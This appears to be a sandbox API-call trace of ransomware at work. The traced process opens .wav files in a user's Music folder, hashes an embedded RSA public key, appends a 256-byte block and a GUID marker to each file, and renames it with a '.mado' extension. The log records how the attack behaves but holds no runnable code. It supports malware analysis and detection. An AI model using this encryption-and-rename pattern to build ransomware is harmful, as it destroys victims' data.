[0204.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.471] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IFpoTZFb.wav") returned=".wav" [0204.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IFpoTZFb.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ifpotzfb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.472] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=68636) returned 1 [0204.472] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.474] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x10bf6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.474] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.478] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.478] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x10c1c, lpOverlapped=0x0) returned 1 [0204.479] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.479] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.479] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.479] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.480] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.480] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.480] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.480] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.480] GetLastError () returned 0x0 [0204.480] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.480] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.480] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.480] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.480] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c20) returned 0x3b81690 [0204.481] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80780 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe280 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b807c8 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe298 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2c8 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe310 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2e0 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6bb80 [0204.481] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c8d0 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2c8 | out: hHeap=0x2c0000) returned 1 [0204.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2e0 | out: hHeap=0x2c0000) returned 1 [0204.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe310 | out: hHeap=0x2c0000) returned 1 [0204.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe310 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe2e0 [0204.482] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x10c1c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.482] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.482] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.482] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.482] CloseHandle (hObject=0x63c) returned 1 [0204.484] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IFpoTZFb.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ifpotzfb.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IFpoTZFb.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ifpotzfb.wav.mado")) returned 1 [0204.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.484] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.485] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd511f6a0, ftCreationTime.dwHighDateTime=0x1d5dca0, ftLastAccessTime.dwLowDateTime=0x2852ad60, ftLastAccessTime.dwHighDateTime=0x1d5e0bf, ftLastWriteTime.dwLowDateTime=0x2852ad60, ftLastWriteTime.dwHighDateTime=0x1d5e0bf, nFileSizeHigh=0x0, nFileSizeLow=0x17850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jR1AF6IsbszDHd9hdDak.wav", cAlternateFileName="JR1AF6~1.WAV")) returned 1 [0204.485] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jR1AF6IsbszDHd9hdDak.wav") returned=".wav" [0204.486] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jR1AF6IsbszDHd9hdDak.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jr1af6isbszdhd9hddak.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.486] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=96336) returned 1 [0204.486] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.488] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1782a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.488] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.490] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x17850, lpOverlapped=0x0) returned 1 [0204.491] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.491] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.491] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.491] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0204.492] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.492] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.492] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.492] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.492] GetLastError () returned 0x0 [0204.492] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.492] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0204.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.492] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.492] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.492] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.492] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c8d0 [0204.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2e0 | out: hHeap=0x2c0000) returned 1 [0204.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2f8 | out: hHeap=0x2c0000) returned 1 [0204.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe328 | out: hHeap=0x2c0000) returned 1 [0204.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe328 [0204.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe2f8 [0204.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe2e0 [0204.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b683c0 [0204.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b68078 [0204.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b683c0 | out: hHeap=0x2c0000) returned 1 [0204.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2f8 | out: hHeap=0x2c0000) returned 1 [0204.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2e0 | out: hHeap=0x2c0000) returned 1 [0204.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe328 | out: hHeap=0x2c0000) returned 1 [0204.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.493] GetCurrentThreadId () returned 0x600 [0204.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71b40 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.494] GetCurrentThreadId () returned 0x600 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe328 [0204.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2e0 [0204.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2f8 [0204.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2c8 [0204.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe340 [0204.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe310 [0204.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe358 [0204.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 